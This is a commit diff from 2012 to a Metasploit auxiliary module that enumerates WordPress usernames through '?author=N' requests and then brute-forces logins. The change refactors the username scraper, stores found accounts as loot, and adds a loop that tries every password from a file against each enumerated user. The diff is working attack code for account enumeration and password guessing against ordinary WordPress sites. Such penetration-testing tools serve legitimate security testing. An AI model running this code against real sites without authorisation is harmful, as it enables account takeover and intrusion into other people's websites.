Apply fixes

sinn3r · sinn3r · commit d92b3bd2e155 · 2012-12-28T17:46:17.000-06:00
diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb
@@ -5,9 +5,6 @@
 #   http://metasploit.com/
 ##
 
-require 'uri'
-
-
 class Metasploit3 < Msf::Auxiliary
 
 	include Msf::Exploit::Remote::HttpClient
@@ -18,18 +15,19 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name'		   => 'Wordpress Brute Force and User Enumeration Utility',
-			'Description'	=> 'Wordpress Authentication Brute Force and User Enumeration Utility',
-			'Author'		 => [
-				'Alligator Security Team',
-				'Tiago Ferreira <tiago.ccna[at]gmail.com>',
-				'Zach Grace <zgrace[at]404labs.com>'
-		],
+			'Name'          => 'Wordpress Brute Force and User Enumeration Utility',
+			'Description'   => 'Wordpress Authentication Brute Force and User Enumeration Utility',
+			'Author'        =>
+				[
+					'Alligator Security Team',
+					'Tiago Ferreira <tiago.ccna[at]gmail.com>',
+					'Zach Grace <zgrace[at]404labs.com>'
+				],
 			'References'     =>
 				[
 					['BID', '35581'],
 					['CVE', '2009-2335'],
-					['OSVDB', '55713'],
+					['OSVDB', '55713']
 				],
 			'License'        =>  MSF_LICENSE
 		)
@@ -41,7 +39,7 @@ def initialize
 				OptBool.new('BRUTEFORCE', [ true, "Perform brute force authentication", true ]),
 				OptBool.new('ENUMERATE_USERNAMES', [ true, "Enumerate usernames", true ]),
 				OptString.new('RANGE_START', [false, 'First user id to enumerate', '1']),
-				OptString.new('RANGE_END', [false, 'Last user id to enumerate', '10']),
+				OptString.new('RANGE_END', [false, 'Last user id to enumerate', '10'])
 		], self.class)
 
 	end
@@ -52,9 +50,11 @@ def target_url
 
 
 	def run_host(ip)
+		usernames = []
 		if datastore['ENUMERATE_USERNAMES']
-			enum_usernames
+			usernames = enum_usernames
 		end
+
 		if datastore['VALIDATE_USERS']
 			@users_found = {}
 			vprint_status("#{target_url} - WordPress Enumeration - Running User Enumeration")
@@ -72,17 +72,29 @@ def run_host(ip)
 			if datastore['VALIDATE_USERS']
 				if @users_found && @users_found.keys.size > 0
 					vprint_status("#{target_url} - WordPress Brute Force - Skipping all but #{uf = @users_found.keys.size} valid #{uf == 1 ? "user" : "users"}")
-				else
-					vprint_status("#{target_url} - WordPress Brute Force - No valid users found. Exiting.")
-					return
 				end
 			end
+
+			# Brute-force using files.
 			each_user_pass { |user, pass|
 				if datastore['VALIDATE_USERS']
 					next unless @users_found[user]
 				end
-					do_login(user, pass)
+
+				do_login(user, pass)
 			}
+
+			# Brute force previously found users
+			if not usernames.empty?
+				print_status("#{target_url} - Brute-forcing previously found accounts...")
+				passwords = load_password_vars(datastore['PASS_FILE'])
+				usernames.each do |user|
+					passwords.each do |pass|
+						do_login(user, pass)
+					end
+				end
+			end
+
 		end
 	end
 
@@ -126,7 +138,8 @@ def do_enum(user=nil)
 					:sname => (ssl ? 'https' : 'http'),
 					:user => user,
 					:port => rport,
-					:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
+					:proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}",
+					
 				)
 
 				@users_found[user] = :reported
@@ -186,42 +199,43 @@ def do_login(user=nil,pass=nil)
 		end
 	end
 
-	def enum_usernames()
-		usernames = Tempfile.new('wp_enum')
-		begin
-			for i in datastore['RANGE_START']..datastore['RANGE_END']
-				uri = "#{datastore['URI'].gsub(/wp-login/, 'index')}?author=#{i}"
-				print_status "Requesting #{uri}"
+	def enum_usernames
+		usernames = []
+		for i in datastore['RANGE_START']..datastore['RANGE_END']
+			uri = "#{datastore['URI'].gsub(/wp-login/, 'index')}?author=#{i}"
+			print_status "#{target_url} - Requesting #{uri}"
+			res = send_request_cgi({
+				'method' => 'GET',
+				'uri' => uri
+			})
+
+			if (res and res.code == 301)
+				uri = URI(res.headers['Location'])
+				uri = "#{uri.path}?#{uri.query}"
 				res = send_request_cgi({
 					'method' => 'GET',
 					'uri' => uri
 				})
+			end
 
-				if (res and res.code == 301)
-					uri = URI(res.headers['Location'])
-					uri = "#{uri.path}?#{uri.query}"
-					res = send_request_cgi({
-						'method' => 'GET',
-						'uri' => uri
-					})
-				end
-
-				if (res == nil)
-					print_error("Error getting response.")
-				elsif (res.code == 200)
-					#username = /<link rel="alternate" type="application\/rss\+xml" title=".*" href="http[s]*:\/\/.*\/(.*)\/feed\/" \/>/.match(res.body.to_s)[1]
-					username = /href="http[s]*:\/\/.*\/author\/(.*)\/feed\//.match(res.body.to_s)[1]
-					usernames.write("#{username}\n")
-					print_good "Found user #{username} with id #{i}"
-				elsif (res.code == 404)
-					print_status "No user with id #{i} found"
-				else
-					print_error "Error, #{res.code} returned."
-				end
+			if res.nil?
+				print_error("#{target_url} - Error getting response.")
+			elsif res.code == 200 and res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i
+				username = $1
+				print_good "#{target_url} - Found user '#{username}' with id #{i.to_s}"
+				usernames << username
+			elsif res.code == 404
+				print_status "#{target_url} - No user with id #{i.to_s} found"
+			else
+				print_error "#{target_url} - Unknown error. HTTP #{res.code.to_s}"
 			end
-		ensure
-			datastore['USER_FILE'] = usernames.path
-			usernames.close
 		end
+
+		if not usernames.empty?
+			p = store_loot('wordpress.users', 'text/plain', rhost, usernames * "\n", "#{rhost}_wordpress_users.txt")
+			print_status("#{target_url} - Usernames stored in: #{p}")
+		end
+
+		return usernames
 	end
 end
